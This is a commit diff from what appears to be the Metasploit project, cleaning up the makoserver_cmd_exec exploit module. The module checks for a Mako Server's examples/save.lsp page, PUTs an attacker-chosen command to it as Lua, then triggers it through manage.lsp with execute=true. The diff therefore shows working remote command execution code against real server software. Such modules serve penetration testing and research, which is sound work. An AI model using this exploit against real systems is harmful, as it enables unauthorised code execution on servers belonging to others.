Land #9193, makoserver_cmd_exec cleanup
commit
7b5ec9d0ec
|
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('URI', [true, 'URI path to the Mako Server app', '/'])
|
OptString.new('TARGETURI', [true, 'URI path to the Mako Server app', '/'])
|
||||||
]
|
]
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
@ -53,17 +53,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
# Send GET request to determine existence of save.lsp page
|
# Send GET request to determine existence of save.lsp page
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp')
|
'uri' => normalize_uri(target_uri.path, 'examples/save.lsp')
|
||||||
}, 20)
|
}, 20)
|
||||||
|
|
||||||
# If response does not include "MakoServer.net", target is not viable.
|
# If response does not include "MakoServer.net", target is not viable.
|
||||||
if res.headers['Server'] !~ /MakoServer.net/
|
if res.headers['Server'] !~ /MakoServer\.net/
|
||||||
vprint_warning('Target is not a Mako Server.')
|
vprint_warning('Target is not a Mako Server.')
|
||||||
return CheckCode::Safe
|
return CheckCode::Safe
|
||||||
end
|
end
|
||||||
|
|
||||||
if res.body
|
if res.body
|
||||||
if res.body =~ /Incorrect usage/
|
if res.body.include?('Incorrect usage')
|
||||||
# We are able to determine that the server has a save.lsp page and
|
# We are able to determine that the server has a save.lsp page and
|
||||||
# returns the correct output.
|
# returns the correct output.
|
||||||
vprint_status('Mako Server save.lsp returns correct ouput.')
|
vprint_status('Mako Server save.lsp returns correct ouput.')
|
||||||
|
@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
return CheckCode::Unknown
|
return CheckCode::Unknown
|
||||||
end
|
end
|
||||||
|
|
||||||
return CheckCode::Safe
|
CheckCode::Safe
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
@ -98,13 +98,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
begin
|
begin
|
||||||
vprint_status('Sending PUT request to save.lsp...')
|
vprint_status('Sending PUT request to save.lsp...')
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'PUT',
|
'method' => 'PUT',
|
||||||
'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'),
|
'uri' => normalize_uri(target_uri.path, 'examples/save.lsp'),
|
||||||
'ctype' => 'text/plain',
|
'ctype' => 'text/plain',
|
||||||
'data' => cmd,
|
'data' => cmd,
|
||||||
'http' => {
|
'vars_get' => {
|
||||||
'X-Requested-With' => 'XMLHttpRequest',
|
'ex' => '2.1'
|
||||||
'Referer' => 'http://localhost/Lua-Types.lsp'
|
|
||||||
}
|
}
|
||||||
}, 20)
|
}, 20)
|
||||||
rescue StandardError => e
|
rescue StandardError => e
|
||||||
|
@ -115,8 +114,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
begin
|
begin
|
||||||
vprint_status('Sending GET request to manage.lsp...')
|
vprint_status('Sending GET request to manage.lsp...')
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua')
|
'uri' => normalize_uri(target_uri.path, 'examples/manage.lsp'),
|
||||||
|
'vars_get' => {
|
||||||
|
'execute' => 'true',
|
||||||
|
'ex' => '2.1',
|
||||||
|
'type' => 'lua'
|
||||||
|
}
|
||||||
}, 20)
|
}, 20)
|
||||||
rescue StandardError => e
|
rescue StandardError => e
|
||||||
fail_with(Failure::NoAccess, "Error: #{e}")
|
fail_with(Failure::NoAccess, "Error: #{e}")
|
||||||
|
|
Loading…
Reference in New Issue